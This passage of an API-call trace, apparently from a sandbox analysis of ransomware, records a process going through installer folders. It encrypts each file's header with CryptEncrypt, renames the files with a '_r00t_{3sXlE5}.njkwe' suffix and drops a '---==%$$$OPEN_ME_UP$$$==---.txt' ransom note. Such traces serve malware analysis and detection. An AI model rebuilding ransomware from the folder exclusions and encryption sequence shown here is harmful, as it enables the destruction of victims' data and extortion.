nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0061.308] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Windows") returned -1 [0061.308] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$Recycle.bin") returned 1 [0061.308] lstrcmpiW (lpString1="SetupResources.dll", lpString2="System Volume Information") returned -1 [0061.308] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files") returned 1 [0061.308] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files (x86)") returned 1 [0061.308] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1040\\SetupResources.dll") returned 49 [0061.308] StrStrIW (lpFirst="SetupResources.dll", lpSrch=".njkwe") returned 0x0 [0061.308] lstrcmpW (lpString1="SetupResources.dll", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0061.308] lstrcmpW (lpString1="SetupResources.dll", lpString2="taridd") returned -1 [0061.308] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1040\\SetupResources.dll", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0061.308] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1040\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0061.327] GetTickCount () returned 0x114fc24 [0061.327] GetTickCount () returned 0x114fc24 [0061.327] GetTickCount () returned 0x114fc24 [0061.327] GetTickCount () returned 0x114fc24 [0061.327] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0061.327] GetProcessHeap () returned 0xbe0000 [0061.328] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0061.328] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.329] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.329] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.330] GetProcessHeap () returned 0xbe0000 [0061.330] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0061.330] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.330] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0061.330] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0061.330] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0061.330] CloseHandle (hObject=0x42c) returned 1 [0061.331] GetProcessHeap () returned 0xbe0000 [0061.331] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0061.332] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1040\\SetupResources.dll_r00t_{3sXlE5}.njkwe") returned 69 [0061.332] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1040\\setupresources.dll"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\SetupResources.dll_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\1040\\setupresources.dll_r00t_{3sxle5}.njkwe")) returned 1 [0061.332] GetProcessHeap () returned 0xbe0000 [0061.332] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0061.332] FindNextFileW (in: hFindFile=0xc19e60, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0061.332] FindClose (in: hFindFile=0xc19e60 | out: hFindFile=0xc19e60) returned 1 [0061.332] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1040\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 62 [0061.332] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\588bce7c90097ed212\\1040\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0061.333] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0061.334] CloseHandle (hObject=0x428) returned 1 [0061.334] GetProcessHeap () returned 0xbe0000 [0061.334] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0061.334] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="1041", cAlternateFileName="")) returned 1 [0061.334] lstrcmpiW (lpString1="1041", lpString2="Windows") returned -1 [0061.334] lstrcmpiW (lpString1="1041", lpString2="$Recycle.bin") returned 1 [0061.334] lstrcmpiW (lpString1="1041", lpString2="System Volume Information") returned -1 [0061.334] lstrcmpiW (lpString1="1041", lpString2="Program Files") returned -1 [0061.334] lstrcmpiW (lpString1="1041", lpString2="Program Files (x86)") returned -1 [0061.334] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1041") returned 30 [0061.334] lstrcmpW (lpString1="1041", lpString2=".") returned 1 [0061.334] lstrcmpW (lpString1="1041", lpString2="..") returned 1 [0061.334] lstrcmpW (lpString1="\\\\?\\C:\\588bce7c90097ed212\\1041", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0061.334] GetProcessHeap () returned 0xbe0000 [0061.334] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0061.334] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1041\\*") returned 32 [0061.334] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19da0 [0061.334] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0061.335] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0061.335] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0061.335] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0061.335] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0061.335] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1041\\.") returned 32 [0061.335] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0061.335] FindNextFileW (in: hFindFile=0xc19da0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0061.335] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0061.335] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0061.335] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0061.335] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0061.335] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0061.335] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1041\\..") returned 33 [0061.335] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0061.335] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0061.335] FindNextFileW (in: hFindFile=0xc19da0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x278d, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0061.335] lstrcmpiW (lpString1="eula.rtf", lpString2="Windows") returned -1 [0061.335] lstrcmpiW (lpString1="eula.rtf", lpString2="$Recycle.bin") returned 1 [0061.335] lstrcmpiW (lpString1="eula.rtf", lpString2="System Volume Information") returned -1 [0061.335] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files") returned -1 [0061.335] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files (x86)") returned -1 [0061.335] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1041\\eula.rtf") returned 39 [0061.335] StrStrIW (lpFirst="eula.rtf", lpSrch=".njkwe") returned 0x0 [0061.335] lstrcmpW (lpString1="eula.rtf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0061.335] lstrcmpW (lpString1="eula.rtf", lpString2="taridd") returned -1 [0061.335] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1041\\eula.rtf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0061.335] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1041\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0061.336] GetTickCount () returned 0x114fc34 [0061.336] GetTickCount () returned 0x114fc34 [0061.336] GetTickCount () returned 0x114fc34 [0061.336] GetTickCount () returned 0x114fc34 [0061.336] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0061.336] GetProcessHeap () returned 0xbe0000 [0061.336] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0061.336] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x278d, lpOverlapped=0x0) returned 1 [0061.337] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffd873, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.337] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x278d, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x278d, lpOverlapped=0x0) returned 1 [0061.338] GetProcessHeap () returned 0xbe0000 [0061.338] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0061.338] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.338] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0061.338] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0061.338] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0061.338] CloseHandle (hObject=0x42c) returned 1 [0061.339] GetProcessHeap () returned 0xbe0000 [0061.339] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0061.339] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1041\\eula.rtf_r00t_{3sXlE5}.njkwe") returned 59 [0061.339] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1041\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\eula.rtf_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\1041\\eula.rtf_r00t_{3sxle5}.njkwe")) returned 1 [0061.340] GetProcessHeap () returned 0xbe0000 [0061.340] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0061.340] FindNextFileW (in: hFindFile=0xc19da0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x10a82, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0061.340] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Windows") returned -1 [0061.341] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$Recycle.bin") returned 1 [0061.341] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="System Volume Information") returned -1 [0061.341] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files") returned -1 [0061.341] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files (x86)") returned -1 [0061.341] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1041\\LocalizedData.xml") returned 48 [0061.341] StrStrIW (lpFirst="LocalizedData.xml", lpSrch=".njkwe") returned 0x0 [0061.341] lstrcmpW (lpString1="LocalizedData.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0061.341] lstrcmpW (lpString1="LocalizedData.xml", lpString2="taridd") returned -1 [0061.341] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1041\\LocalizedData.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0061.341] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1041\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0061.341] GetTickCount () returned 0x114fc34 [0061.341] GetTickCount () returned 0x114fc34 [0061.341] GetTickCount () returned 0x114fc34 [0061.341] GetTickCount () returned 0x114fc34 [0061.341] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0061.341] GetProcessHeap () returned 0xbe0000 [0061.341] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0061.341] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.343] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.343] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.344] GetProcessHeap () returned 0xbe0000 [0061.344] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0061.344] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.344] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0061.344] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0061.344] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0061.344] CloseHandle (hObject=0x42c) returned 1 [0061.346] GetProcessHeap () returned 0xbe0000 [0061.346] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0061.346] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1041\\LocalizedData.xml_r00t_{3sXlE5}.njkwe") returned 68 [0061.346] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1041\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\LocalizedData.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\1041\\localizeddata.xml_r00t_{3sxle5}.njkwe")) returned 1 [0061.416] GetProcessHeap () returned 0xbe0000 [0061.416] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0061.416] FindNextFileW (in: hFindFile=0xc19da0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3d58, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0061.416] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Windows") returned -1 [0061.416] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$Recycle.bin") returned 1 [0061.416] lstrcmpiW (lpString1="SetupResources.dll", lpString2="System Volume Information") returned -1 [0061.416] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files") returned 1 [0061.416] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files (x86)") returned 1 [0061.416] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1041\\SetupResources.dll") returned 49 [0061.416] StrStrIW (lpFirst="SetupResources.dll", lpSrch=".njkwe") returned 0x0 [0061.416] lstrcmpW (lpString1="SetupResources.dll", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0061.416] lstrcmpW (lpString1="SetupResources.dll", lpString2="taridd") returned -1 [0061.416] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1041\\SetupResources.dll", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0061.416] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1041\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0061.416] GetTickCount () returned 0x114fc82 [0061.416] GetTickCount () returned 0x114fc82 [0061.416] GetTickCount () returned 0x114fc82 [0061.417] GetTickCount () returned 0x114fc82 [0061.417] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0061.417] GetProcessHeap () returned 0xbe0000 [0061.417] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0061.417] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.419] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.419] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.419] GetProcessHeap () returned 0xbe0000 [0061.419] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0061.419] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.419] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0061.419] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0061.419] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0061.419] CloseHandle (hObject=0x42c) returned 1 [0061.421] GetProcessHeap () returned 0xbe0000 [0061.421] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0061.421] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1041\\SetupResources.dll_r00t_{3sXlE5}.njkwe") returned 69 [0061.421] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1041\\setupresources.dll"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\SetupResources.dll_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\1041\\setupresources.dll_r00t_{3sxle5}.njkwe")) returned 1 [0061.421] GetProcessHeap () returned 0xbe0000 [0061.421] HeapFree (in: 